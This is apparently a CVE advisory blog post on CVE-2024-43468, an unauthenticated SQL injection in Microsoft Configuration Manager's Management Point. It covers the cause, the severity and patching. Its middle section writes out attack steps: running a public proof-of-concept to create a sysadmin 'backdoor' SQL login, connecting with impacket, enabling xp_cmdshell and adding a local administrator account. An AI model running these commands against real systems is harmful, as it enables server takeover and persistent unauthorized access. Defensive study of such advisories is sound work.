Microsoft Configuration Manager, SQL Injection, CVE-2024-43468 (Critical)

Listen to this Post

The vulnerability, identified as CVE-2024-43468, is an unauthenticated SQL injection flaw in Microsoft Configuration Manager (formerly SCCM), specifically within the MP_Location service that handles client messages . The root cause is the improper sanitization of user-supplied input in database queries, with the `getMachineID` and `getContentID` functions serving as primary attack vectors . An unauthenticated attacker with network access to a Management Point can send specially crafted HTTP requests to the server . Because these requests are processed unsafely, the attacker can inject arbitrary SQL commands into the backend site database, which are executed with the high-privilege context of the MP machine account, often granted the sysadmin role . This allows the attacker to escalate the injection to remote code execution by enabling and using commands like xp_cmdshell, effectively gaining full control over the server and database . Microsoft patched this in October 2024, but public proof-of-concept code was released in November 2024, leading to active exploitation .

dailycve form:

Platform: Microsoft Configuration Manager
Version: 2303-2403
Vulnerability : SQL Injection
Severity: Critical (9.8)
date: Oct 8, 2024

Prediction: Patched (Oct 2024)

What Undercode Say:

Analytics:

The vulnerability (CVE-2024-43468) is a classic SQL injection (CWE-89) that requires no privileges and no user interaction . Its CVSS:3.1 vector (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) highlights its critical nature, indicating it is remotely exploitable with low complexity and has a high impact on confidentiality, integrity, and availability . Although Microsoft initially assessed exploitation as “less likely,” the release of a public Proof-of-Concept (PoC) exploit by Synacktiv on November 26, 2024, drastically increased the risk . This was confirmed when CISA added the flaw to its Known Exploited Vulnerabilities (KEV) catalog on February 12, 2026, due to active attacks . Federal agencies were mandated to patch by March 5, 2026 . The exploit leverages the MP’s high database privileges to enable `xp_cmdshell` for operating system command execution .

Example of checking for vulnerable versions (Conceptual)
The script below demonstrates how the exploit works conceptually.
It is based on the public PoC from Synacktiv.
1. Use the public Python exploit script to execute a SQL query.
This command attempts to create a new SQL admin login via the injection point.
python3 CVE-2024-43468.py -t http://<SCCM_MP_Server> -sql "create login backdoor with password = 'ComplexP@ss'; exec master.dbo.sp_addsrvrolemember 'backdoor', 'sysadmin'"
2. After creating a backdoor account, an attacker can connect to the SQL database.
impacket-mssqlclient 'backdoor:ComplexP@ss'@<SCCM_DB_Server>
3. Once connected to the SQL server, the attacker can execute system commands.
Enable advanced options and xp_cmdshell if not already enabled.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Then run a system command, for example, to add a local admin user.
EXEC xp_cmdshell 'net user backdoor_user P@ssw0rd! /add && net localgroup administrators backdoor_user /add';

Exploit:

The exploit targets the Management Point’s location service . By manipulating the `SourceID` field in a request message, an attacker can inject malicious SQL . The public exploit script automates this to execute arbitrary SQL queries. From there, standard SQL Server techniques like enabling `xp_cmdshell` allow the attacker to run operating system commands on the database server, effectively taking it over . This access can be used to pivot into the broader network, extract sensitive data, or deploy ransomware .

Protection from this CVE:

  1. Apply Patch: Install the security updates released by Microsoft in October 2024 (KB5044285 or later) for affected versions (2303, 2309, 2403) .
  2. Network Segmentation: Restrict inbound traffic to SCCM management points (typically ports 80/443, 1433) from untrusted IP addresses using firewalls .
  3. Principle of Least Privilege: Ensure the database account used by the Management Point has the minimum necessary privileges, rather than the sysadmin role .
  4. Input Validation: Employ robust input validation and parameterized queries to prevent SQL injection .
  5. Threat Hunting: Scan for Indicators of Compromise (IOCs) such as unexpected SQL errors, unusual database activity, new admin accounts, or the execution of `xp_cmdshell` .

Impact:

Successful exploitation grants an unauthenticated attacker full control over the Configuration Manager server and its site database . This can lead to complete compromise of the IT management infrastructure, enabling attackers to deploy malicious software, steal sensitive data (including credentials), and move laterally across the entire enterprise network . Given the centralized nature of SCCM, this poses a significant risk to large organizations and has been flagged by CISA as an active threat .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top